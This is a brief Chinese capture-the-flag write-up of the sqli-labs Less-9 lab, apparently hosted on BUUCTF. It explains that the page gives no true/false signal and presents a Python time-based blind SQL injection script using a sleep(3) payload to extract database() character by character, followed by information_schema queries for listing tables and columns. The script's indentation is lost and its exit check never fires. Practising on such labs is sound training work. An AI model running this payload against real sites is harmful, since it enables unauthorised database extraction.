less-9
观察页面只有一个返回值You are in…
即使值为错也没有返回
因此采用时间盲注
import requests
import string
import time
ip="http://a86ecc66-5929-4b0d-b39c-842de53f0121.node4.buuoj.cn/Less-9/?id="
command="database()"
result=""
for i in range(1,100):
for j in string.ascii_letters:
sql=f"1' and if(ord(substr(({command}),{i},1))=ord('{j}'),sleep(3),4) %23"
print(ip+sql)
now=time.time()
requests.get(url=ip+sql)
after=time.time()
gap=after-now
if gap <3:
pass
elif gap>=3:
result+=j
print(f"result:{result}")
if ord(f'{j}')==127:
exit(0)
select table_name from information_schema.tables where table_schema='security' limit 0,1
select column_name from information_schema.columns where table_schema='security' limit 0,1
select id from table_name